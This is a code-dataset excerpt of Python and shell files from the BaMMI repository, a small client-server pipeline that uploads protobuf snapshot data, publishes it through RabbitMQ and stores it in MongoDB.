send_snapshots_data(url: str, reader: Reader, server_accepted_fields: list):\n user_id = reader.get_user_data().user_id\n for snapshot in reader.generate_snapshot_data_ready_to_send(server_accepted_fields):\n post_from_url(url, headers={'Content-Type': reader.get_data_content_type(),\n 'user-id': str(user_id)}, data=snapshot)\n" }, { "alpha_fraction": 0.6649937033653259, "alphanum_fraction": 0.6662484407424927, "avg_line_length": 25.566667556762695, "blob_id": "7b4362a86f79b51af6fbd7643b3067a2abc1a1f0", "content_id": "79fe8e439c15286db6ab661d2fb1233dba180d75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 797, "license_type": "no_license", "max_line_length": 64, "num_lines": 30, "path": "/BaMMI/saver/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .Saver import Saver\nfrom ..utils.Constants import mongodb_url\nfrom ..utils.CLITemplate import log, main\n\n\[email protected]()\[email protected]('-d', '--database', default=mongodb_url, type=str)\[email protected]('topic-name', type=str)\[email protected]('raw-data-path', type=click.Path(exists=True))\ndef save(database, topic_name, raw_data_path):\n saver = Saver(database)\n log(saver.save(topic_name, raw_data_path))\n\n\[email protected]('run-saver')\[email protected]('db_url', type=str)\[email protected]('mq_url', type=str)\ndef run_saver(db_url, mq_url):\n saver = Saver(db_url)\n log(saver.consume_topics(mq_url))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='saver', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" }, { "alpha_fraction": 0.45281583070755005, "alphanum_fraction": 0.4558599591255188, "avg_line_length": 39.43077087402344, "blob_id": "b660313ef06cf8cfc420f04b2a307f352255aad1", "content_id": "0e6cf12f15e97a87672a482a4bbc81feced232b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2628, "license_type": "no_license", "max_line_length": 111, "num_lines": 65, "path": "/BaMMI/utils/drivers/db_drivers/MongoDriver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient, ASCENDING, UpdateOne\n\n\nclass MongoDriver:\n\n def __init__(self, url, db_name=\"bammi_data\", table_name=\"users_and_snapshots\"):\n self.client = MongoClient(url)\n self.db = self.client[db_name]\n self.table_name = self.db[table_name]\n\n def insert_single_data_unit(self, data):\n self.table_name.insert_one(data)\n\n def insert_many_data_units(self, data_list):\n self.table_name.insert_many(data_list)\n\n def upsert_data_unit(self, key, data):\n self.table_name.update_one(key, data, upsert=True)\n\n def create_index_for_id(self, key_name, *args, **kwargs):\n self.table_name.create_index([(key_name, ASCENDING)], *args, **kwargs)\n\n def query_data(self, query=None, *args, **kwargs):\n return self.table_name.find(query, *args, **kwargs)\n\n def insert_snapshot_data_by_user(self, user_data, snapshot_data, field_name):\n # Idea for array upsert taken from https://stackoverflow.com/questions/22664972/mongodb-upsert-on-array\n user_id = user_data['user_id']\n operations = [\n # If the document doesn't exist at all, insert it\n UpdateOne({'user_id': user_id},\n {\n '$setOnInsert': {\n **{k: v for k, v in user_data.items()},\n 'snapshots': [{'datetime': snapshot_data['datetime']}]\n }\n },\n upsert=True\n ),\n # If the document exists, update it\n UpdateOne({'user_id': user_id,\n 'snapshots': {\n '$elemMatch': {\n 'datetime': snapshot_data['datetime']\n }\n }\n },\n {\n '$set':\n {\n f'snapshots.$.{field_name}': snapshot_data[field_name]\n }\n }\n ),\n # If an array element doesn't exist, add it. Won't conflict with the update a step before\n UpdateOne({'user_id': user_id, 'snapshots.datetime': snapshot_data['datetime']},\n {\n '$addToSet': {\n 'snapshots': {\n field_name: snapshot_data[field_name]\n }\n }\n })\n ]\n self.table_name.bulk_write(operations)\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.725806474685669, "avg_line_length": 48.79999923706055, "blob_id": "6fddb8366e8ee62fc129103f779446518acb8030", "content_id": "0b1a90776bdb58f92b57dab971bc1172318c9e2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "no_license", "max_line_length": 145, "num_lines": 5, "path": "/BaMMI/parsers/run_parsers.sh", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncommand_prefix=\"python -m BaMMI.parsers -t run-parser\"\nmq_url=\"rabbitmq://rabbitmq:5672/\"\n$command_prefix pose $mq_url & $command_prefix color_image $mq_url & $command_prefix depth_image $mq_url & $command_prefix feelings $mq_url && fg" }, { "alpha_fraction": 0.679049015045166, "alphanum_fraction": 0.6939078569412231, "avg_line_length": 47.07143020629883, "blob_id": "94caffeae2127d70899f51fcbf7446addc2888bb", "content_id": "18ccec53b2682f56657451f082c9c3198ccc97eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 673, "license_type": "no_license", "max_line_length": 110, "num_lines": 14, "path": "/BaMMI/server/Server.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from ..utils.APIServer import FlaskWrapper\nfrom ..server.Receiver import Receiver, publish_to_message_queue\n\n\ndef run_server(host='127.0.0.1', port=8000, publish=publish_to_message_queue):\n url_prefix = '/uploads'\n app = FlaskWrapper('server')\n receiver = Receiver(publish)\n app.add_endpoint(f'{url_prefix}/config', 'config', receiver.send_server_supported_fields, methods=['GET'])\n app.add_endpoint(f'{url_prefix}/users', 'user_upload', receiver.receive_user_data, methods=['POST'])\n app.add_endpoint(f'{url_prefix}/snapshots', 'snapshots_upload', receiver.receive_snapshot_data,\n methods=['POST'])\n\n app.run(host=host, port=port)\n" }, { "alpha_fraction": 0.6508293747901917, "alphanum_fraction": 0.652797281742096, "avg_line_length": 45.19480514526367, "blob_id": "77b019b347980664cf9205f2f5d90413d8fa8526", "content_id": "5eb40d11c5ee92b133a755da61dff1a6b8a78a58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3557, "license_type": "no_license", "max_line_length": 118, "num_lines": 77, "path": "/BaMMI/server/Receiver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import json\nfrom flask import jsonify, request\nfrom google.protobuf.json_format import MessageToDict\nimport numpy as np\nfrom ..utils import UtilFunctions\nfrom ..utils.BaMMI_pb2 import Snapshot, User\nfrom ..utils.Constants import rabbit_mq_url\nfrom ..utils.PubSuber import PubSuber\n\n\ndef publish_to_message_queue(user_data, snapshot, binary_type_data, array_type_data,\n message_queue_url=rabbit_mq_url):\n data_to_publish = prepare_data_for_queue(user_data['user_id'], snapshot, binary_type_data, array_type_data)\n publisher = PubSuber(message_queue_url) # TODO: Make it so we don't connect to the MQ each time, wrap in a class?\n publisher.init_exchange('snapshots_data', exchange_type='topic')\n publisher.publish_message(json.dumps({'user_data': user_data, 'snapshot_data': data_to_publish}),\n '.'.join(data_to_publish.keys()))\n\n\ndef convert_binary_fields_to_files(user_id, data, binary_type_data, array_type_data):\n field_to_file_path = {}\n for field in data.ListFields():\n field_name = field[0].name\n if field_name in [*binary_type_data, *array_type_data]:\n field_data = field[1].data\n file_path = UtilFunctions.build_path_for_files_from_data(\n UtilFunctions.get_true_relative_path(__file__, '../storage'),\n user_id, str(data.datetime), '.'.join((field_name, 'raw')))\n if field_name in binary_type_data:\n UtilFunctions.save_data_to_file(field_data, file_path, 'b')\n else:\n array_data = np.array(field_data, dtype=float)\n array_data.astype('float').tofile(file_path)\n field_to_file_path[field_name] = file_path\n return field_to_file_path\n\n\ndef prepare_data_for_queue(user_id, data, binary_type_data, array_type_data):\n file_paths_data = convert_binary_fields_to_files(user_id, data, binary_type_data, array_type_data)\n data_to_publish = MessageToDict(data, preserving_proto_field_name=True)\n for field in file_paths_data:\n data_to_publish[field]['data'] = file_paths_data[field]\n return data_to_publish\n # TODO: In case data comes in other formats, convert it to a valid json\n\n\nclass Receiver:\n\n def __init__(self, publish_function):\n self.publish_function = publish_function\n self.message_type_data = ['pose', 'feelings', 'datetime']\n self.binary_type_data = ['color_image']\n self.array_type_data = ['depth_image']\n self.known_users = {}\n\n def send_server_supported_fields(self):\n return jsonify([*self.message_type_data, *self.binary_type_data, *self.array_type_data])\n\n def receive_user_data(self):\n user_data = request.data\n user = User()\n user.ParseFromString(user_data)\n user_dict = MessageToDict(user, preserving_proto_field_name=True)\n for field in user.DESCRIPTOR.fields:\n if field.name not in user_dict:\n # Handling case where zero-value enums are omitted - https://github.com/golang/protobuf/issues/258\n user_dict[field.name] = 0\n self.known_users[str(user.user_id)] = user_dict\n return jsonify(success=True)\n\n def receive_snapshot_data(self):\n user_id = request.headers.get('user-id')\n snapshot_data = request.data\n snapshot = Snapshot()\n snapshot.ParseFromString(snapshot_data)\n self.publish_function(self.known_users[user_id], snapshot, self.binary_type_data, self.array_type_data)\n return jsonify(success=True)\n" }, { "alpha_fraction": 0.6071707010269165, "alphanum_fraction": 0.6087295413017273, "avg_line_length": 35.112674713134766, "blob_id": "add4fada4fb88e1286c65cd6333ee110330f967b", "content_id": "c05da22eeb18680fb556142a9e43ff6677f7aa71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2566, "license_type": "no_license", "max_line_length": 91, "num_lines": 71, "path": "/BaMMI/client/ProtoDriver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import gzip\nimport struct\nfrom ..utils.BaMMI_pb2 import User, Snapshot\n\n\nclass ProtoDriver:\n def __init__(self, file_path):\n self.f = gzip.open(file_path, 'rb')\n self.user = None\n\n def close(self):\n if self.f:\n self.f.close()\n self.f = None\n\n def get_user_data(self):\n if self.user is None and not self.f:\n raise RuntimeError(\"User data wasn't saved before file closed\")\n if self.user is None: # If we got here, self.f is already opened\n user_data_length = _read_message_length(self.f)\n user = User()\n user.ParseFromString(self.f.read(user_data_length))\n self.user = user\n return self.user\n\n def get_user_data_ready_to_send(self):\n return self.get_user_data().SerializeToString()\n\n def generate_snapshot_data_ready_to_send(self, server_accepted_fields):\n while self.f:\n snapshot_length = _read_message_length(self.f)\n if snapshot_length:\n snapshot = Snapshot()\n snapshot.ParseFromString(self.f.read(snapshot_length))\n for field in snapshot.ListFields():\n field_name = field[0].name\n if field_name not in server_accepted_fields:\n snapshot.ClearField(field_name)\n yield snapshot.SerializeToString()\n else: # EOF reached, no more snapshots\n return\n\n @staticmethod\n def get_data_content_type():\n return 'application/protobuf'\n\n\ndef _read_message_length(f):\n return _read_bytes_as_format_from_file(f, 4, 'I')\n\n\ndef _read_bytes_as_format_from_file(f, num_of_bytes, bytes_format, endian='little'):\n \"\"\"\n A relic from a time where reading binary data was the norm.\n Helper function to read bytes from a file and parse them according to the given format.\n :param f: An open file to read bytes from.\n :param num_of_bytes: The number of bytes that is required to read.\n :param bytes_format: The format which the bytes aligned to know how to unpack them.\n :param endian: little/big, according to the data endianness.\n :return: The data in the file according to the arguments given.\n \"\"\"\n if endian.lower() == 'little':\n endian = '<'\n elif endian.lower() == 'big':\n endian = '>'\n else:\n raise ValueError(\"Endian should be 'little' or 'big'\")\n bts = f.read(num_of_bytes)\n if len(bts) < num_of_bytes:\n return None\n return struct.unpack(f'{endian}{bytes_format}', bts)[0]\n\n\n" }, { "alpha_fraction": 0.4371165633201599, "alphanum_fraction": 0.5061349868774414, "avg_line_length": 23.148147583007812, "blob_id": "fba76bd6a4c085efb4895c69037fc606ec9d6fd2", "content_id": "525147a616b5d8c622efdc260759b5f0de99bbf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 48, "num_lines": 27, "path": "/setup.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\n\nsetup(\n name='BaMMI',\n version='0.1.9',\n author='Roy Peleg',\n description='Basic Mind-Machine Interface.',\n packages=find_packages(where='BaMMI'),\n package_dir={\"\": \"BaMMI\"},\n install_requires=[\n 'Click==7.0',\n 'codecov==2.0.16',\n 'Flask==1.1.1',\n 'matplotlib==3.2.1',\n 'numpy==1.22.0',\n 'pika==1.1.0',\n 'Pillow==9.0.1',\n 'protobuf==3.15.0',\n 'pytest==5.3.2',\n 'pytest-cov==2.8.1',\n 'pymongo==3.10.1',\n 'requests==2.23.0'\n ],\n tests_require=['pytest', 'pytest-cov'],\n python_requires='>=3.8',\n)\n" }, { "alpha_fraction": 0.6171875, "alphanum_fraction": 0.71875, "avg_line_length": 30.75, "blob_id": "cceaeb76fd4081e04b251e32bb951a9563bc66e5", "content_id": "d22d9c0fcae79dec1152ebfbc8ed3d140fcb68b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/BaMMI/utils/Constants.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "\nstorage_folder = 'BaMMI/storage'\n\nmongodb_url = \"mongodb://BaMMI:1337@mongo:27017\"\nrabbit_mq_url = 'rabbitmq://rabbitmq:5672/'\n" }, { "alpha_fraction": 0.6057529449462891, "alphanum_fraction": 0.6412859559059143, "avg_line_length": 28.549999237060547, "blob_id": "bd4263419ec866d0961d5d8d8cc326ff8ee7f9fe", "content_id": "e4f970b45ead71897903d1913a87059bd8336962", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/BaMMI/client/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .client import upload_sample as upload\nfrom ..utils.CLITemplate import log, main\n\n\[email protected]()\[email protected]('-h', '--host', default='127.0.0.1', type=str)\[email protected]('-p', '--port', default=8000, type=int)\[email protected]('path', default='snapshot.mind.gz', type=click.Path(exists=True))\ndef upload_sample(host='127.0.0.1', port=8000, path='sample.mind.gz'):\n log(upload(host, port, path))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='client', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" }, { "alpha_fraction": 0.6823204159736633, "alphanum_fraction": 0.6837016344070435, "avg_line_length": 23.965517044067383, "blob_id": "6c507715a8f156acf63c8b4ae17488edddf50126", "content_id": "0ef9d2eefc3334ee61b029136b12b12d7cf23136", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 724, "license_type": "no_license", "max_line_length": 62, "num_lines": 29, "path": "/BaMMI/parsers/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom . import ParserHandler\nfrom ..utils.CLITemplate import log, main\n\n\nparser_handler = ParserHandler.ParserHandler()\n\n\[email protected]()\[email protected]('parser_name', type=str)\[email protected]('raw_data_path', type=click.Path(exists=True))\ndef parse(parser_name, raw_data_path):\n log(parser_handler.parse(parser_name, raw_data_path))\n\n\[email protected]('run-parser')\[email protected]('parser_name', type=str)\[email protected]('mq_url', type=str)\ndef run_parser(parser_name, mq_url):\n log(parser_handler.run_parser(parser_name, mq_url))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='parsers', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" } ]
40
chrmorais/KivySurvey
https://github.com/chrmorais/KivySurvey
9eb42accfea5685b2a0bf20a14c2132b832051bf
ca46ed1095908cd362c1eeabc47d3327f1fe79ce
01d651561637c15abd7e94801979d479f748c41b
refs/heads/master
2020-05-29T09:14:08.635116
2014-10-31T19:37:14
2014-10-31T19:37:14
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5227988958358765, "alphanum_fraction": 0.5366561412811279, "avg_line_length": 36.258140563964844, "blob_id": "b37961793b96d24d0127bba7f14b146dd048d513", "content_id": "270825b1b742448bb63548ab5445bc1b4f25d4d2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32041, "license_type": "permissive", "max_line_length": 80, "num_lines": 860, "path": "/kivy_survey/__init__.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\n__version__ = '0.0.1'\nimport kivy\nfrom flat_kivy import FlatApp, ThemeManager\nfrom kivy.properties import (StringProperty, NumericProperty, ObjectProperty,\n ListProperty, DictProperty, BooleanProperty)\ntry:\n from plyer import gps\nexcept:\n pass\nfrom flat_kivy.ui_elements import (ErrorContent, OptionContent, FlatIconButton, \n FlatLabel)\nfrom surveyquestions import SurveyQuestionNumerical\nfrom kivy.base import EventLoop\nfrom kivy.clock import Clock\nfrom flat_kivy.numpad import DecimalNumPad, NumPad\nfrom flat_kivy.ui_elements import FlatPopup as Popup\nfrom flat_kivy.utils import construct_target_file_name\nfrom kivy.uix.screenmanager import Screen, ScreenManager, SlideTransition\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.event import EventDispatcher\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom flat_kivy.ui_elements import (ButtonBehavior, GrabBehavior, \n TouchRippleBehavior, ThemeBehavior)\nfrom kivy.uix.anchorlayout import AnchorLayout\nfrom dbinterface import DBInterface\nfrom surveyquestions import SurveyQuestion\nfrom survey import Survey\nfrom kivy.storage.jsonstore import JsonStore\nfrom functools import partial\nfrom kivy.lang import global_idmap, Builder\nfrom flat_kivy.font_definitions import style_manager\n\n\n\nclass NavTray(BoxLayout):\n go_back_callback = ObjectProperty(None, allownone=True)\n go_forward_callback = ObjectProperty(None, allownone=True)\n ramp_group_name = StringProperty('navtray_group')\n\n def _go_forward(self):\n go_forward_callback = self.go_forward_callback\n if go_forward_callback is not None:\n go_forward_callback()\n\n def _go_back(self):\n go_back_callback = self.go_back_callback\n if go_back_callback is not None:\n go_back_callback()\n\n\nclass SubjectsLayout(GridLayout):\n subject_id = NumericProperty(None, allownone=True)\n questionnaire = StringProperty(None, allownone=True)\n\n\nclass SurveyHeader(GridLayout):\n subject_id = NumericProperty(None, allownone=True)\n questionnaire = StringProperty(None, allownone=True)\n use_parent_id = BooleanProperty(False)\n\n def on_questionnaire(self, instance, value):\n self.load_headers(self.subject_id)\n\n def on_subject_id(self, instance, value):\n self.load_headers(value)\n \n def load_headers(self, subject_id):\n ksurvey = self.kivysurvey\n headers = ksurvey.get_header_lines()\n db_interface = ksurvey.db_interface\n add_widget = self.add_widget\n if self.use_parent_id:\n try:\n subject_id = ksurvey.previous_subject_ids[-1]\n except:\n pass\n self.clear_widgets()\n for each in headers:\n content = ''\n for header in each:\n if isinstance(header, list):\n content += str(db_interface.get_entry(\n subject_id, header[0], header[1], header[2]))\n else:\n content += header\n content += ' '\n\n if content is not '':\n label = FlatLabel(text=str(content))\n \n else:\n label = FlatLabel(text='Error Retrieving Field: ' + \n each[0] + each[1] + each[2])\n label.color_tuple = ('Gray', '0000')\n add_widget(label)\n\n\nclass SubjectButton(GrabBehavior, TouchRippleBehavior, ButtonBehavior, \n ThemeBehavior, BoxLayout):\n of_interest = BooleanProperty(False)\n color = ListProperty([1., 1., 1., 1.])\n color_down = ListProperty([1., 1., 1., 1.])\n button_fields = ListProperty(None, allownone=True)\n font_color_tuple = ListProperty(['Grey', '1000'])\n color_tuple = ListProperty(['Blue', '500'])\n ripple_color_tuple = ListProperty(['Grey', '0000'])\n style = StringProperty(None, allownone=True)\n font_ramp_tuple = ListProperty(['default', '1'])\n\n\n def __init__(self, **kwargs):\n super(SubjectButton, self).__init__(**kwargs)\n\n def on_color(self, instance, value):\n self.color_down = [x*.7 for x in value]\n \n def on_button_fields(self, instance, value):\n self.clear_widgets()\n for each in value:\n if type(each) is str:\n txt = each\n else:\n txt = str(each)\n l = FlatLabel(text=txt, theme=(b'blue', b'variant_3'), \n color_tuple=self.font_color_tuple, style=self.style,\n )\n l.font_ramp_tuple = self.font_ramp_tuple\n self.bind(font_ramp_tuple=l.setter('font_ramp_tuple'))\n self.bind(font_color_tuple=l.setter('color_tuple'))\n self.bind(style=l.setter('style'))\n \n self.add_widget(l)\n\n\nclass QuestionsLayout(GridLayout):\n subject_id = NumericProperty(None, allownone=True)\n questionnaire = StringProperty(None, allownone=True)\n page = StringProperty(None, allownone=True)\n manual_control = BooleanProperty(False)\n ramp_name = StringProperty('default')\n font_ramp_tuple = ListProperty(['default', '1'])\n\n def __init__(self, **kwargs):\n super(QuestionsLayout, self).__init__(**kwargs)\n Clock.schedule_once(self.setup)\n\n def load_member(self, p_id):\n pass\n\n def on_questionnaire(self, instance, value):\n page = self.page\n if not self.manual_control:\n if page is not None and value is not None:\n self.load_page(str(page), str(value))\n self.load_page_data()\n else:\n self.clear_all()\n\n def clear_all(self):\n for each in self.children:\n each.font_ramp_tuple = ('default', '1')\n self.clear_widgets()\n\n\n def on_page(self, instance, value):\n questionnaire = self.questionnaire\n if not self.manual_control:\n if questionnaire is not None and value is not None:\n self.load_page(str(value), str(questionnaire))\n self.load_page_data()\n else:\n self.clear_all()\n\n def save_page_data(self):\n survey = self.kivysurvey\n db_interface = survey.db_interface\n subject_id = self.subject_id\n page = self.page\n questionnaire = self.questionnaire\n\n if self.check_answers_valid():\n for question in self.children:\n if isinstance(question, SurveyQuestion): \n if not question.disabled:\n question_name = question.question_name\n answer = question.to_json()\n db_interface.set_entry(subject_id, questionnaire, \n page, question_name, answer)\n\n def load_page_data(self):\n ksurvey = self.kivysurvey\n db_interface = ksurvey.db_interface\n page = self.page\n questionnaire = self.questionnaire\n subject_id = self.subject_id\n\n for question in self.children:\n if isinstance(question, SurveyQuestion): \n if not question.disabled:\n question_name = question.question_name\n question.from_json(db_interface.get_entry(subject_id, \n questionnaire, page, question_name))\n question.do_transition = False\n Clock.schedule_once(question._schedule_validate)\n Clock.schedule_once(question._schedule_reset_do_transition)\n\n def setup(self, dt):\n pass\n\n def load_page(self, page_name, questionnaire_name):\n survey = self.kivysurvey.survey\n questionnaire = survey.questionnaires[questionnaire_name]\n try:\n page = questionnaire.pages[page_name]\n except:\n page = None\n if page is not None:\n self.clear_all()\n questions = page.questions\n for each in page.question_order:\n question = questions[each]\n wid = question.widget\n print(wid)\n wid.font_ramp_tuple = self.font_ramp_tuple\n self.add_widget(wid)\n\n def check_answers_valid(self):\n answers_valid = True\n db_interface = self.kivysurvey.db_interface\n # verifier = db_interface.verifier\n # verify = verifier.verify\n # raise_error = self.app.root.raise_error\n # for question in self.children:\n # if isinstance(question, SurveyQuestion): \n # if not question.disabled:\n # if question.check_answered():\n # if not verify(\n # question.question_name, question.answer, \n # self.current_individual_id):\n # answers_valid = False\n # raise_error('Answer Not Valid',\n # str(question.answer) + ' is not valid for ' \n # + question.question_text)\n # else:\n # answers_valid = False\n # raise_error('Questions Not Completed',\n # 'You must answer ' + question.question_text)\n return answers_valid\n\n def clear_questions(self):\n self.parent.scroll_to_top()\n for question in self.children:\n if isinstance(question, SurveyQuestion):\n question.clear_question()\n\n\nclass SubjectsScreen(Screen):\n allow_add_subject = BooleanProperty(False)\n add_subject_button = ObjectProperty(None)\n current_subjects = ListProperty(None, allownone=True)\n font_ramp_tuple = ListProperty(['default', '1'])\n field_font_ramp_tuple = ListProperty(['default_field', '1'])\n\n def __init__(self, **kwargs):\n super(SubjectsScreen, self).__init__(**kwargs)\n self.add_subject_button = add_sub = FlatIconButton(\n text='Add Subject',\n size_hint=(1.0, None),\n height=str('80dp'),\n icon='fa-pencil-square',\n theme=(b'blue', b'variant_1'),\n color=(43./255., 153./255., 1.0),\n font_ramp_tuple=self.font_ramp_tuple,\n on_release=self.add_member_callback)\n self.bind(font_ramp_tuple=add_sub.setter('font_ramp_tuple'))\n\n def add_member_callback(self, instance):\n self.kivysurvey.add_member()\n\n \n def on_allow_add_subject(self, instance, value):\n nav_layout = self.ids.navtray.ids.custom\n add_subject_button = self.add_subject_button\n if value and add_subject_button not in nav_layout.children:\n nav_layout.add_widget(add_subject_button)\n \n elif not value and add_subject_button in nav_layout.children:\n nav_layout.remove_widget(add_subject_button)\n\n def on_current_subjects(self, instance, value):\n subjects_layout = self.ids.subjects\n for each in subjects_layout.children:\n each.font_ramp_tuple = ('default', '1')\n subjects_layout.clear_widgets()\n if value is not None:\n for each in value:\n self.add_subject(each)\n\n def add_subject(self, subject_id):\n #get data for displaying\n #create button\n #add button to subjects layout\n subjects_layout = self.ids.subjects\n ksurvey = self.kivysurvey\n db_interface = ksurvey.db_interface\n get_entry = db_interface.get_entry\n survey = ksurvey.survey\n questionnaire = ksurvey.questionnaire\n current_page = ksurvey.current_page.page\n fields = survey.get_subject_fields(questionnaire)\n new_fields = []\n new_fields_a = new_fields.append\n for each in fields:\n if isinstance(each, list):\n new_fields_a(get_entry(subject_id, each[0], each[1], each[2]))\n else:\n new_fields_a(each)\n new_button = SubjectButton(\n on_release=partial(ksurvey.open_member, \n subject_id),\n font_ramp_tuple=self.field_font_ramp_tuple)\n self.bind(field_font_ramp_tuple=new_button.setter('font_ramp_tuple'))\n subjects_layout.add_widget(new_button)\n new_button.button_fields = new_fields\n\n\n\nclass QuestionnaireScreen(Screen):\n page = StringProperty(None, allownone=True)\n name = StringProperty('question_screen_group')\n\n\nclass KivySurvey(ScreenManager):\n current_page = ObjectProperty(None, allownone=True)\n current_subjects = ListProperty(None, allownone=True)\n db_interface = ObjectProperty(None)\n current_subjects = ListProperty(None, allownone=True)\n subject_id = NumericProperty(None, allownone=True)\n previous_subject_ids = ListProperty(None, allownone=True)\n current_page = ObjectProperty(None, allownone=True)\n current_subjects_page = ObjectProperty(None, allownone=True)\n next_page = StringProperty(None, allownone=True)\n prev_page = StringProperty(None, allownone=True)\n survey = ObjectProperty(None)\n current_location = DictProperty({})\n gps_loc_interval = NumericProperty(30.0)\n questionnaire = StringProperty(None, allownone=True)\n top_level_questionnaire = StringProperty(None, allownone=True)\n root = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n global_idmap.update({'kivysurvey': self})\n self.db_interface = DBInterface(self)\n super(KivySurvey, self).__init__(**kwargs)\n self.transition = SlideTransition()\n json = JsonStore(construct_target_file_name('survey.json', __file__))\n for each in json:\n print(each)\n self.survey = Survey(json)\n try:\n gps.configure(on_location=self.receive_gps)\n except:\n pass\n Clock.schedule_once(self.start_gps)\n\n def on_subject_id(self, instance, value):\n self.load_subjects(value, self.questionnaire)\n\n def create_subject(self):\n db_interface = self.db_interface\n uid = db_interface.get_unique_id()\n prev_id = self.previous_subject_ids[-1]\n db_interface.add_subject(prev_id, self.questionnaire, uid)\n return uid\n\n def pop_subjects(self):\n previous_subject_ids = self.previous_subject_ids\n if len(previous_subject_ids) > 0:\n self.subject_id = self.previous_subject_ids.pop()\n else:\n self.subject_id = None\n \n def on_questionnaire(self, instance, value):\n self.load_subjects(self.subject_id, value)\n self.current_subjects_page.allow_add_subject = (\n self.survey.get_allow_add_subjects(value))\n\n def load_subjects(self, subject_id, questionnaire):\n self.current_subjects = self.db_interface.get_subjects(\n subject_id, questionnaire)\n\n def get_header_lines(self):\n return self.survey.get_header_definitions(self.questionnaire)\n\n def set_next_page(self):\n survey = self.survey\n next_page = survey.get_next_page(\n self.questionnaire, self.current_page.page)\n \n if next_page is None:\n return False\n else:\n self.next_page = None\n self.next_page = next_page\n return True\n\n def add_member(self):\n self.transition.direction = 'left'\n self.previous_subject_ids.append(self.subject_id)\n self.subject_id = None\n self.reset_questionnaire()\n\n def open_member(self, member_id, instance):\n self.transition.direction = 'left'\n self.previous_subject_ids.append(self.subject_id)\n self.subject_id = member_id\n self.reset_questionnaire()\n current_page = self.current_page.ids.questions\n current_page.load_page_data()\n\n def reset_questionnaire(self):\n self.current_page.page = None\n self.set_next_page() \n self.swap_pages()\n self.current_page.ids.questions.clear_questions()\n\n def set_prev_page(self):\n survey = self.survey\n prev_page = survey.get_prev_page(\n self.questionnaire, self.current_page.page)\n if prev_page is None:\n return False\n else:\n self.prev_page = prev_page\n return True\n\n def swap_subjects(self):\n subjects1 = self.ids.subjects1\n subjects2 = self.ids.subjects2\n current_subjects_page = self.current_subjects_page\n if current_subjects_page is subjects1:\n self.current = 'subjects2'\n self.current_subjects_page = subjects2\n elif current_subjects_page is subjects2:\n self.current = 'subjects1'\n self.current_subjects_page = subjects1\n self.current_subjects_page.allow_add_subject = (\n self.survey.get_allow_add_subjects(self.questionnaire))\n self.current_page.ids.scrollview.scroll_to_top()\n\n def swap_pages(self):\n\n questions1 = self.ids.questions1\n questions2 = self.ids.questions2\n current_page = self.current_page\n if current_page is questions1:\n self.current = 'questions2'\n self.current_page = questions2\n questions1.page = None\n elif current_page is questions2:\n self.current = 'questions1'\n self.current_page = questions1\n questions2.page = None\n self.current_page.ids.scrollview.scroll_to_top()\n\n def on_next_page(self, instance, value):\n questions1 = self.ids.questions1\n questions2 = self.ids.questions2\n current_page = self.current_page\n if current_page is questions1:\n questions2.page = value\n elif current_page is questions2:\n questions1.page = value\n\n def on_prev_page(self, instance, value):\n questions1 = self.ids.questions1\n questions2 = self.ids.questions2\n current_page = self.current_page\n if current_page is questions1:\n questions2.page = value\n elif current_page is questions2:\n questions1.page = value\n\n def start_questionnaire(self, questionnaire):\n self.current_page.page = None\n self.swap_subjects()\n self.questionnaire = questionnaire\n self.set_next_page()\n\n def save_page(self):\n current_page = self.current_page.ids.questions\n current_page.save_page_data()\n\n\n def go_back(self):\n does_page_exist = self.set_prev_page()\n survey = self.survey\n questionnaire = self.questionnaire\n prev_questionnaire = survey.get_previous_questionnaire()\n self.transition.direction = 'right'\n if self.current in ['subjects1', 'subjects2']:\n if prev_questionnaire is None:\n self.app.root.change_screen('cluster', go_back=True)\n return\n else:\n if survey.get_allow_add_subjects(questionnaire):\n self.pop_subjects()\n self.start_questionnaire(survey.pop_previous_questionnaire())\n elif does_page_exist:\n self.swap_pages()\n else:\n if self.subject_id is None:\n 